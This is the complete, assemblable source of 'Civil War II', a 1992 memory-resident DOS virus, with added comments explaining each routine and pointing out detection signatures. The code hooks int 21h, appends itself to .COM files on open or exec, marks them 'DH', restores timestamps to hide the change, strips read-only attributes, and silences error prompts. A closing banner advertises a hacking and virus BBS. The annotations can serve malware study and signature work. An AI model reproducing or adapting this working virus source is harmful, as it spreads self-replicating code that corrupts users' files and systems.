;****************************************************************************
; Civil War II V1.1                                                         *
;                                                                           *
; Assembled with Tasm 2.5                                                   *
; (c) 1992 Trident/Dark Helmet, The Netherlands                             *
;                                                                           *
;****************************************************************************
;                                                                           *
; Civil War...                                                              *
;                                                                           *
; "For all I've seen has changed my mind                                    *
; But still the wars go on as the years go by                               *
; With no love for God or human rights                                      *
; 'Cause all these dreams are swept aside                                   *
; By bloody hands of the hypnotized                                         *
; Who carry the cross of homicide                                           *
; And history bears the scars of our civil war"                             *
;                                                                           *
;****************************************************************************

.Radix 16                               ; default radix is hex: bare numbers below
                                        ; (40, 100, 5a ...) are hex unless suffixed 'd'

Civil_War Segment

Model small

Assume cs:Civil_War, ds:Civil_War, es:Civil_War

org 100h                                ; .COM image, loaded at PSP:0100h

len equ offset last - begin             ; size of the part appended to a host:
                                        ; 'begin' .. 'last' (the 6-byte 'dummy'
                                        ; stub in front is not part of it)

virus_len equ len / 16d                 ; same size in paragraphs (16d = decimal 16);
                                        ; not referenced anywhere in this listing

; Generation-0 host stub and program entry point (see 'end dummy').
; Byte layout: E9 03 00 = jmp +3 (lands on 'begin' at 0106h), then 'D','H'
; (44h 48h) = the infection marker, then 00h. An infected .COM gets the same
; first five bytes from write_jmp: E9 <rel16> 'D' 'H'.
; Detection note: check_infect treats 'D','H' at file offsets 3-4 as
; "already infected" (compared against 'initials').
dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection marker

;---------------------------------------------------------------------------
; Start of the appended code, reached through the E9 jump at file offset 0.
; Runs once each time an infected program starts:
;   1. put the host's saved original 6 bytes back at 0100h
;   2. ask int 21h whether the resident copy is already installed (AH=0A0h)
;   3. if not: shrink this program's MCB by 40h paragraphs (1 KB), copy 'len'
;      bytes into the freed area at the top of memory, point int 21h there
;   4. jump to 0100h to run the host
; Register roles: bp = difference between assembled offsets and the offsets
; the code actually runs at (0 only in the generation-0 carrier); data is
; reached as [label+bp] here. In the resident copy the same data sits 6
; bytes lower, because the copy starts at 'begin' rather than 'dummy' --
; that is the "-6" on every reference made from resident code.
;---------------------------------------------------------------------------
begin:          Call virus                      ; pushes IP (offset of 'virus') on the stack

virus:          pop bp                          ; get IP from stack.
                sub bp,109h                     ; 'virus' assembles at 0109h; bp = relocation delta

restore_host:   mov di,0100h                    ; copy the saved original 6 bytes back
                lea si,ds:[carrier_begin+bp]    ; over the start of the host (cs=ds=es=PSP)
                mov cx,06h
                rep movsb

check_resident: mov ah,0a0h                     ; self-recognition call: a resident copy
                int 21h                         ; answers with AX=0001h (see main_virus)
                cmp ax,0001h
                je end_virus                    ; already installed -> just run the host

adjust_memory:  mov ax,cs                       ; the paragraph before the PSP is this
                dec ax                          ; program's Memory Control Block
                mov ds,ax
                cmp byte ptr ds:[0000],5a       ; 'Z' = last block in the MCB chain;
                jne abort                       ; anything else: do not go resident
                mov ax,ds:[0003]                ; MCB size field (paragraphs):
                sub ax,40                       ; shrink by 40h paragraphs = 1 KB
                mov ds:[0003],ax
                sub word ptr ds:[0012],40h      ; ds:[0012] = PSP:[0002] (top-of-memory
                                                ; segment); lower it by the same amount

install_virus:  mov bx,ax                       ; es = PSP + new size = first segment
                mov ax,es                       ; of the 1 KB just carved out
                add ax,bx
                mov es,ax
                mov cx,len                      ; cx = length of the appended code
                mov ax,ds                       ; ds back to the PSP/code segment
                inc ax
                mov ds,ax
                lea si,ds:[begin+bp]            ; source: 'begin' at its actual offset
                lea di,es:0100                  ; destination: hi-mem:0100h
                rep movsb                       ; copy the code (and its data area)
                mov [virus_segment+bp],es       ; remember where the resident copy lives
                mov ax,cs                       ; restore es
                mov es,ax

hook_vector:    cli                             ; no interrupts while the vector is swapped
                mov ax,3521h                    ; get current int 21h vector -> es:bx
                int 21h
                mov ds,[virus_segment+bp]       ; ds = resident copy; its data is at label-6
                mov old_21h-6h,bx               ; save the original vector; continu and
                mov old_21h+2-6h,es             ; do_int21h chain to it

                mov dx,offset main_virus - 6h   ; new int 21h handler = main_virus in the copy
                mov ax,2521h
                int 21h
                sti

abort:          mov ax,cs                       ; ds/es back to the PSP for the host
                mov ds,ax
                mov es,ax

end_virus:      mov bx,0100h                    ; transfer control to the restored
                jmp bx                          ; host at 0100h


;*****************************************************************************

;---------------------------------------------------------------------------
; Resident int 21h handler (installed by hook_vector; runs in the copy at
; virus_segment, so every data reference carries the "-6" adjustment).
;   AH=0A0h            : self-recognition, returns AX=0001h (see check_resident)
;   AH=3Dh / AX=4B00h  : open / exec -> chk_com inspects the file name
;   anything else      : passed unchanged to the original vector in old_21h
; Detection note: an int 21h call with AH=0A0h returning AX=1 is the
; installation fingerprint this code relies on.
;---------------------------------------------------------------------------
main_virus:     pushf
                cmp ah,0a0h                     ; self-recognition call?
                jne new_21h                     ; no: ordinary DOS call
                mov ax,0001h                    ; ax = id ("installed")
                popf                            ; return the id to the caller
                iret

new_21h:        push ds                         ; save registers
                push es
                push di
                push si
                push ax
                push bx
                push cx
                push dx

check_open:     cmp ah,3dh                      ; open-file function?
                je chk_com

check_exec:     cmp ax,04b00h                   ; exec (load and run) function?
                je chk_com

continu:        pop dx                          ; restore registers (chk_com returns here too)
                pop cx
                pop bx
                pop ax
                pop si
                pop di
                pop es
                pop ds
                popf
                jmp dword ptr cs:[old_21h-6]    ; chain to the original int 21h handler

;---------------------------------------------------------------------------
; File-name filter and infection path, entered from new_21h with the
; caller's ds:dx = ASCIIZ path of the open/exec request. Only a name whose
; extension reads "COM" followed by a NUL is processed; anything else goes
; straight back to continu and the original DOS call proceeds.
; Behaviour an analyst can observe in this routine:
;   - int 24h (critical error) is redirected to new_24h for the duration
;   - the read-only attribute is cleared by set_atribuut and never restored
;   - date/time are read before and written back after the file is changed,
;     so timestamps do not reveal the modification
;   - a file already carrying 'D','H' at offsets 3-4 is left alone
;   - all DOS calls go through do_int21h, i.e. bypass this hook itself
;---------------------------------------------------------------------------
chk_com:        mov cs:[name_seg-6],ds          ; keep the path pointer for later calls
                mov cs:[name_off-6],dx
                cld                             ; scan forward for the '.'
                mov di,dx                       ; es:di = path (copy ds into es)
                push ds
                pop es
                mov al,'.'
                repne scasb                     ; cx is not loaded here: the scan limit
                                                ; is whatever the caller left in cx
                cmp word ptr es:[di],'OC'       ; word 'OC' is "CO" in memory order
                jne continu
                cmp word ptr es:[di+2],'M'      ; 'M' followed by 00h (end of string)
                jne continu

                call set_int24h                 ; hook the critical-error handler
                call set_atribuut               ; clear the read-only bit

open_file:      mov ds,cs:[name_seg-6]
                mov dx,cs:[name_off-6]
                mov ax,3D02h                    ; open file, read/write access
                call do_int21h
                jc close_file                   ; open failed: close_file then uses
                push cs                         ; whatever 'handle' currently holds
                pop ds
                mov [handle-6],ax               ; keep the handle for the procedures
                mov bx,ax

                call get_date                   ; save the file's date/time

check_infect:   push cs
                pop ds
                mov bx,[handle-6]               ; read the first 6 bytes of the file
                mov ah,3fh
                mov cx,06h
                lea dx,[carrier_begin-6]        ; into the slot that write_virus appends
                call do_int21h                  ; as the host's original start
                mov al, byte ptr [carrier_begin-6]+3 ; bytes 3 and 4: the 'D','H' marker?
                mov ah, byte ptr [carrier_begin-6]+4
                cmp ax,[initials-6]             ; initials = 4844h
                je save_date                    ; already infected: only restore timestamp

get_lenght:     mov ax,4200h                    ; seek to offset 0
                call move_pointer
                mov ax,4202h                    ; seek to end: ax = file length (low word)
                call move_pointer
                sub ax,03h                      ; minus the 3-byte jmp = rel16 displacement,
                mov [lenght_file-6],ax          ; so the jmp at offset 0 lands on 'begin'

                call write_jmp                  ; offset 0: E9 <length-3> 'D' 'H'
                call write_virus                ; append 'len' bytes at the end of the file

save_date:      push cs
                pop ds
                mov bx,[handle-6]
                mov dx,[date-6]                 ; put back the date/time saved by get_date
                mov cx,[time-6]
                mov ax,5701h
                call do_int21h

close_file:     mov bx,[handle-6]
                mov ah,03eh                     ; close file
                call do_int21h

                mov dx,cs:[old_24h-6]           ; restore the original int 24h vector
                mov ds,cs:[old_24h+2-6]
                mov ax,2524h
                call do_int21h

                jmp continu                     ; back to the intercepted DOS call

; Temporary int 24h (critical error) handler, active only while a file is
; being processed (set_int24h .. close_file). Returns AL=3 = "fail the
; call", so a write-protected disk or similar error produces no
; "Abort, Retry, Ignore?" prompt that would draw attention.
new_24h:        mov al,3
                iret

;---------------------------------------------------------------------------
; PROCEDURES
;---------------------------------------------------------------------------

; move_pointer: lseek on the open file to offset 0 relative to the origin
; selected by the caller.
; In:   ax = 4200h (from start) or 4202h (from end), set by the caller
; Out:  whatever the original int 21h returns; callers read ax afterwards
; Uses: ds (= cs), bx (= saved handle), cx:dx = 0
move_pointer:   push cs
                pop ds
                mov bx,[handle-6]               ; handle stored by open_file
                xor cx,cx                       ; offset cx:dx = 0
                xor dx,dx
                call do_int21h
                ret

; do_int21h: invoke the original int 21h handler directly.
; pushf + far call through old_21h reproduces what an INT would push, while
; bypassing the hook at main_virus so the handler never re-enters itself.
; Every DOS call made from resident code goes through here.
do_int21h:      pushf
                call dword ptr cs:[old_21h-6]
                ret

; write_jmp: overwrite the first 5 bytes of the host with
;   E9 <lenght_file> 'D' 'H'
; i.e. a jmp to the appended code followed by the infection marker.
; Done as three separate writes of 1, 2 and 2 bytes on the saved handle.
write_jmp:      push cs
                pop ds
                mov ax,4200h                    ; seek to offset 0
                call move_pointer
                mov ah,40h                      ; write 1 byte: E9 (jmp rel16 opcode)
                mov cx,01h
                lea dx,[jump-6]
                call do_int21h
                mov ah,40h                      ; write 2 bytes: displacement = length - 3
                mov cx,02h
                lea dx,[lenght_file-6]
                call do_int21h
                mov ah,40h                      ; write 2 bytes: 'D','H' marker
                mov cx,02h
                lea dx,[initials-6]
                call do_int21h
                ret

; write_virus: append the resident image to the end of the host.
; .Radix 16 is in effect, so 'mov ah,40' is 40h (write) and 'mov dx,100'
; is 0100h. ds = cs = the resident segment, where 0100h is 'begin' of the
; copy; 'len' bytes from there cover the code plus the data area, including
; the host's original 6 bytes just read into carrier_begin.
write_virus:    push cs
                pop ds
                mov ax,4202h                    ; seek to end of file
                call move_pointer
                mov ah,40                       ; write (40h)
                mov cx,len
                mov dx,100                      ; from ds:0100h
                call do_int21h
                ret

; get_date: read the open file's date/time (AX=5700h; cx = time, dx = date)
; and store both so save_date can write them back unchanged after the
; modification. Expects bx = handle, set by open_file just before the call.
get_date:       mov ax,5700h
                call do_int21h
                push cs
                pop ds
                mov [date-6],dx
                mov [time-6],cx
                ret

; set_int24h: save the current int 24h vector in old_24h and point int 24h
; at new_24h inside the resident copy (hence "-6"). close_file restores it.
set_int24h:     mov ax,3524h                    ; get vector -> es:bx
                call do_int21h
                mov cs:[old_24h-6],bx
                mov cs:[old_24h+2-6],es
                mov dx,offset new_24h-6         ; ds:dx = replacement handler
                push cs
                pop ds
                mov ax,2524h
                call do_int21h
                ret

; set_atribuut: clear the read-only attribute of the target file so the
; following open for read/write succeeds. Uses the path saved in
; name_seg:name_off. The original attribute value is neither saved nor
; restored anywhere in this listing -- a formerly read-only file stays
; writable afterwards, which is itself an observable trace.
set_atribuut:   mov ax,4300h                    ; get attribute -> cx
                mov ds,cs:[name_seg-6]
                mov dx,cs:[name_off-6]
                call do_int21h
                and cl,0feh                     ; clear bit 0 (read-only)
                mov ax,4301h                    ; set attribute
                call do_int21h
                ret

;---------------------------------------------------------------------------
; DATA  (in the resident copy every label here sits at its assembled offset
;        minus 6 -- see the "-6" on each reference made from resident code)
;---------------------------------------------------------------------------

old_21h         dw 00h,00h                      ; original int 21h vector (offset, segment)
old_24h         dw 00h,00h                      ; original int 24h vector (offset, segment)
carrier_begin   db 090h, 0cdh, 020h, 044h, 048h, 00h ; host's original first 6 bytes; for the
                                                ; generation-0 carrier: nop / int 20h / 'D','H' / 00h
text            db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet, The Netherlands',00h
                                                ; not referenced by any code; carried in every
                                                ; infected file, so usable as a string signature
jump            db 0e9h                         ; opcode placed at file offset 0 by write_jmp
name_seg        dw ?                            ; ds:dx of the intercepted open/exec path
name_off        dw ?
virus_segment   dw ?                            ; segment of the resident copy
lenght_file     dw ?                            ; host length - 3 = jmp displacement
handle          dw ?                            ; file handle from open_file
date            dw ?                            ; date/time saved by get_date,
time            dw ?                            ; written back by save_date
initials        dw 4844h                        ; 'D','H' infection marker (file offsets 3-4)
last            db 090h                         ; end of the appended image ('len' = last - begin)

Civil_war ends

end dummy                                       ; entry point = the 6-byte stub

;--------------------------------------------------------------------------;
;------------------> and Remember Don't Forget to Call <-------------------;
;------------> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <-----------;
;--------------------------------------------------------------------------;
